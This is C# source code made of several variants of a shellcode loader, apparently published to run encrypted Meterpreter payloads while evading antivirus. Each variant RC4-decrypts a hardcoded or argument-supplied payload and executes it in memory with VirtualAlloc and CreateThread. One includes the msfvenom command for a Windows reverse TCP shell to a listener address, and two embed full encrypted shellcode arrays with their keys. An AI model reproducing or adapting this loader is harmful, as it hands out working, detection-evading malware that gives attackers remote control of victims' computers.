/// <summary>
/// You can use Meterpreter Encrypted Payloads with this C# Source code
/// Publisher and Author: Damon mohammadbagher
/// Email : [email protected]
/// Step 1 : you should Encrypt your Msfvenom Payload with EncryptMaker tool
/// Step 2 : you can hardcode your encrypted Payload in this code by value "Payload_Encrypted"
/// or you can use command prompt argument for importing Encrypted Payload to this code (Safe)
/// for more information visit this link
/// link : https://www.linkedin.com/pulse/bypass-all-anti-viruses-encrypted-payloads-c-damon-mohammadbagher
///
/// </summary>
/// <param name="args"></param>
static void Main(string[] args)
{
string Payload_Encrypted;
if (args != null)
{
Payload_Encrypted = args[0].ToString();
}
else
{
Payload_Encrypted = "88,136,167";
}
string[] Payload_Encrypted_Without_delimiterChar = Payload_Encrypted.Split(',');
byte[] _X_to_Bytes = new byte[Payload_Encrypted_Without_delimiterChar.Length];
for (int i = 0; i < Payload_Encrypted_Without_delimiterChar.Length; i++)
{
byte current = Convert.ToByte(Payload_Encrypted_Without_delimiterChar[i].ToString());
_X_to_Bytes[i] = current;
}
byte[] KEY = { 0x11, 0x22, 0x11, 0x00, 0x00, 0x01, 0xd0, 0x00, 0x00, 0x11, 0x00, 0x00, 0x00, 0x00, 0x00, 0x11, 0x00, 0x11, 0x01, 0x11, 0x11, 0x00, 0x00 };
byte[] Finall_Payload = Decrypt(KEY, _X_to_Bytes);
Console.WriteLine("Bingo Meterpreter session ;)");
UInt32 funcAddr = VirtualAlloc(0, (UInt32)Finall_Payload.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
Marshal.Copy(Finall_Payload, 0, (IntPtr)(funcAddr), Finall_Payload.Length);
IntPtr hThread = IntPtr.Zero;
UInt32 threadId = 0;
IntPtr pinfo = IntPtr.Zero;
/// execute native code
hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId);
WaitForSingleObject(hThread, 0xFFFFFFFF);
}
static void Main(string[] args)
{
Console.WriteLine();
Console.ForegroundColor = ConsoleColor.DarkGray;
Console.WriteLine("Payload Decryption tool by arguments.");
Console.ForegroundColor = ConsoleColor.DarkGreen;
Console.WriteLine();
string Payload_Encrypted;
string[] Input_Keys = args[0].Split(' ');
byte[] xKey = new byte[Input_Keys.Length];
Console.Write("[!] Decryption KEY: ");
Console.ForegroundColor = ConsoleColor.Yellow;
/// Converting String to Byte for KEY
for (int i = 0; i < Input_Keys.Length; i++)
{
xKey[i] = Convert.ToByte(Input_Keys[i], 16);
Console.Write(xKey[i].ToString("x2") + " ");
}
Console.ForegroundColor = ConsoleColor.DarkGreen;
/// Converting String to Byte
Payload_Encrypted = args[1].ToString();
string[] Payload_Encrypted_Without_delimiterChar = Payload_Encrypted.Split(' ');
byte[] _X_to_Bytes = new byte[Payload_Encrypted_Without_delimiterChar.Length];
for (int i = 0; i < Payload_Encrypted_Without_delimiterChar.Length; i++)
{
byte current = Convert.ToByte(Payload_Encrypted_Without_delimiterChar[i].ToString());
_X_to_Bytes[i] = current;
}
try
{
Console.WriteLine();
Console.WriteLine("[!] Loading Encrypted Payload in Memory.");
Console.ForegroundColor = ConsoleColor.Green;
byte[] Final_Payload = Decrypt(xKey, _X_to_Bytes);
Console.WriteLine("[>] Decrypting Payload by KEY in Memory.");
Console.ForegroundColor = ConsoleColor.Gray;
Console.WriteLine();
Console.WriteLine();
Console.WriteLine("FUMA: All is ok!");
UInt32 funcAddr = VirtualAlloc(0, (UInt32)Final_Payload.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
Marshal.Copy(Final_Payload, 0, (IntPtr)(funcAddr), Final_Payload.Length);
IntPtr hThread = IntPtr.Zero;
UInt32 threadId = 0;
IntPtr pinfo = IntPtr.Zero;
hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId);
WaitForSingleObject(hThread, 0xffffffff);
}
catch (Exception)
{
throw;
}
}
static void Main(string[] args)
{
Console.WriteLine();
Console.ForegroundColor = ConsoleColor.DarkGray;
Console.WriteLine("Full hardcoded payload decryption tool");
Console.ForegroundColor = ConsoleColor.DarkGreen;
Console.WriteLine();
Console.WriteLine("[!] Using hardcoded RC4 key.");
/// Text to Hex: 123123123123 = 31 32 33 31 32 33 31 32 33 31 32 33
string Payload_Encrypted;
byte[] xKey = { 0x31, 0x32, 0x33, 0x31, 0x32, 0x33, 0x31, 0x32, 0x33, 0x31, 0x32, 0x33 };
/// msfvenom --platform windows -p windows/x64/shell/reverse_tcp lhost=192.168.237.129 lport=4443 -f csharp
Payload_Encrypted = "175 184 60 102 21 156 200 251 37 99 66 219 63 75 242 224 5 196 232 243 7 50 212 4 150 179 11 237 65 198 73 160 250 123 163 200 148 88 54 115 198 95 33 32 63 127 76 188 66 207 8 179 210 202 16 114 73 26 49 163 195 164 251 234 131 139 81 203 159 14 184 196 75 52 202 135 49 13 84 104 176 170 158 251 120 166 179 138 67 221 166 5 214 42 82 105 83 68 198 248 245 99 76 45 167 123 108 47 23 133 63 102 228 242 157 39 77 210 33 117 175 227 7 51 96 238 171 149 170 46 165 109 49 166 209 34 36 211 32 91 161 174 57 254 38 198 51 101 122 67 31 240 55 91 141 121 234 21 56 130 88 85 48 173 104 224 64 174 25 20 36 251 64 5 68 36 59 221 140 73 167 215 210 233 104 243 25 12 221 108 64 104 25 110 216 152 135 64 16 99 92 77 222 251 249 104 180 240 50 169 118 113 215 135 155 246 251 69 212 37 19 21 127 150 0 71 37 5 10 1 105 45 191 84 224 125 160 231 73 230 170 116 22 152 204 179 234 88 237 67 49 85 113 36 92 110 98 124 110 20 71 230 45 91 163 71 57 148 117 22 7 12 99 43 39 73 212 247 29 69 250 141 23 72 130 171 131 247 232 131 20 231 38 94 121 143 232 176 122 109 141 140 200 84 179 81 101 12 47 177 115 129 234 104 133 15 97 215 72 191 182 220 26 107 171 77 96 30 252 212 201 217 139 49 31 41 237 131 26 36 163 190 167 233 91 10 9 186 38 226 10 254 13 201 34 45 196 126 24 180 58 250 221 222 156 119 170 38 36 149 67 186 186 217 216 120 158 17 159 6 7 162 31 14 228 81 80 72 204 15 13 50 49 209 147 225 1 219 237 112 236 37 147 225 55 37 104 217 128 132 38 31 177 71 106 225 228 195 164 244 9 126 245 13 141 251 227 11 178 201 216 56 19 159 49 132 201 111 248 97 148 57 74 109 252 177 95 199 51 57 69 246 55 6 43 131 43 44 90 165 90 52 10 228 30 108 180 217 190 31 204 208 228 216 1 119 123 43 94 67 165 109 151 154 131 111 104 15 253 145 42 42 229 119 158 199 249 42 182 27 224 88 118 9 83 125 178 130 250 153";
string[] Payload_Encrypted_Without_delimiterChar = Payload_Encrypted.Split(' ');
byte[] _X_to_Bytes = new byte[Payload_Encrypted_Without_delimiterChar.Length];
for (int i = 0; i < Payload_Encrypted_Without_delimiterChar.Length; i++)
{
byte current = Convert.ToByte(Payload_Encrypted_Without_delimiterChar[i].ToString());
_X_to_Bytes[i] = current;
}
try
{
Console.WriteLine();
Console.WriteLine("[!] Loading encrypted payload in Memory Done.");
Console.ForegroundColor = ConsoleColor.Green;
byte[] Final_Payload = Decrypt(xKey, _X_to_Bytes);
Console.WriteLine("[>] Decrypting `payload by KEY in Memory Done.");
Console.ForegroundColor = ConsoleColor.DarkYellow;
Console.WriteLine();
Console.WriteLine();
Console.WriteLine("Reverse session done!");
UInt32 funcAddr = VirtualAlloc(0, (UInt32)Final_Payload.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
Marshal.Copy(Final_Payload, 0, (IntPtr)(funcAddr), Final_Payload.Length);
IntPtr hThread = IntPtr.Zero;
UInt32 threadId = 0;
IntPtr pinfo = IntPtr.Zero;
hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId);
WaitForSingleObject(hThread, 0xffffffff);
}
catch (Exception)
{
throw;
}
}
static void Main(string[] args)
{
Console.WriteLine();
Console.ForegroundColor = ConsoleColor.DarkGray;
Console.WriteLine("Payload Decryption tool for Meterpreter Payloads ");
Console.ForegroundColor = ConsoleColor.Gray;
Console.WriteLine("Published by Damon Mohammadbagher 2016-2017");
Console.ForegroundColor = ConsoleColor.DarkGreen;
Console.WriteLine();
Console.WriteLine("[!] Using RC4 Decryption for your Payload By KEY.");
string Payload_Encrypted;
byte[] xKey = { 0x11, 0x22, 0x11, 0x00, 0x00, 0x01, 0xd0, 0x00, 0x00, 0x11, 0x00, 0x00,
0x00, 0x00, 0x00, 0x11, 0x00, 0x11, 0x01, 0x11, 0x11, 0x00, 0x00 };
//string[] Input_Keys = args[0].Split(' ');
//byte[] xKey = new byte[Input_Keys.Length];
Console.Write("[!] Decryption KEY is : ");
Console.ForegroundColor = ConsoleColor.Yellow;
/// Converting String to Byte for KEY by first Argument
//for (int i = 0; i < Input_Keys.Length; i++)
//{
// xKey[i] = Convert.ToByte(Input_Keys[i], 16);
// Console.Write(xKey[i].ToString("x2") + " ");
//}
Console.ForegroundColor = ConsoleColor.DarkGreen;
/// Converting String to Byte for Encrypted Meterpreter Payload by Second Argument
//Payload_Encrypted = args[0].ToString();
Payload_Encrypted = "0 84 37 71 69 109 37 60 21 235 228 108 17 204 176 36 198 93 237 156 145 184 238 1 181 165 137 167 87 222 160 187 124 92 202 24 168 213 233 136 47 91 129 7 14 9 103 63 95 141 211 34 201 140 241 165 213 137 208 219 133 54 49 0 118 140 100 199 158 10 107 116 107 224 90 214 159 208 228 26 231 73 26 151 85 112 83 140 229 51 128 197 75 241 140 169 228 9 68 236 172 198 13 57 86 126 136 198 101 115 100 168 67 172 1 23 246 143 214 151 253 13 113 69 215 169 12 226 190 215 247 224 137 68 123 43 11 12 207 194 2 0 143 251 187 15 171 245 24 105 3 68 10 81 252 63 250 150 219 229 147 55 50 11 237 89 185 220 100 248 20 180 42 175 246 34 27 1 131 203 175 49 104 33 218 144 110 193 189 206 206 204 62 138 78 2 102 75 130 176 183 93 184 252 9 136 155 117 228 39 177 96 169 181 89 233 114 114 29 56 223 163 247 33 145 203 41 151 165 242 162 133 149 123 84 169 156 172 75 103 144 63 254 1 116 121 152 182 15 109 48 242 80 94 76 100 131 28 114 3 119 227 147 76 105 132 185 70 93 236 253 186 193 177 67 202 216 136 241 19 146 16 146 184 10 41 206 30 4 95 176 204 190 95 71 7 146 160 30 113 50 249 159 156 194 14 53 130 12 252 44 159 214 216 139 81 51 145 166 5 194 165 155 160 230 79 185 162 170 103 2 110 95 48 207 207 215 245 167 106 133 70 28 238 114 70 20 7 9 173 132 7 76 226 242 193 123 148 140 199 238 178 109 188 235 52 137 157 233 228 81 21 238 197 38 148 121 77 139 229 155 23 205 66 195 75 35 170 53 81 201 168 212 241 100 156 110 97 185 225 216 106 6 4 171 46 150 154 186 122 208 171 210 33 38 188 129 153 108 126 196 85 178 29 210 128 120 137 73 176 239 6 176 142 238 215 213 176 182 116 152 48 133 217 212 138 97 4 33 165 45 73 54 254 153 125 218 97 156 185 191 100 229 210 112 99 221 159 198 220 211 134 120 15 116 52 150 214 214 8 175 162 109 236 32 48 109 20 106 48 132 102 114 73 23 254 207 38 139 14 109 223 99 164 53 213 52 15 33 211";
string[] Payload_Encrypted_Without_delimiterChar = Payload_Encrypted.Split(' ');
byte[] _X_to_Bytes = new byte[Payload_Encrypted_Without_delimiterChar.Length];
for (int i = 0; i < Payload_Encrypted_Without_delimiterChar.Length; i++)
{
byte current = Convert.ToByte(Payload_Encrypted_Without_delimiterChar[i].ToString());
_X_to_Bytes[i] = current;
}
try
{
Console.WriteLine();
Console.WriteLine("[!] Loading Encrypted Meterprter Payload in Memory Done.");
Console.ForegroundColor = ConsoleColor.Green;
byte[] Final_Payload = Decrypt(xKey, _X_to_Bytes);
Console.WriteLine("[>] Decrypting Meterprter Payload by KEY in Memory Done.");
Console.ForegroundColor = ConsoleColor.Gray;
Console.WriteLine();
Console.WriteLine();
Console.WriteLine("Bingo Meterpreter session by Encrypted Payload ;)");
UInt32 funcAddr = VirtualAlloc(0, (UInt32)Final_Payload.Length, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
Marshal.Copy(Final_Payload, 0, (IntPtr)(funcAddr), Final_Payload.Length);
IntPtr hThread = IntPtr.Zero;
UInt32 threadId = 0;
IntPtr pinfo = IntPtr.Zero;
hThread = CreateThread(0, 0, funcAddr, pinfo, 0, ref threadId);
WaitForSingleObject(hThread, 0xffffffff);
}
catch (Exception)
{
throw;
}
}
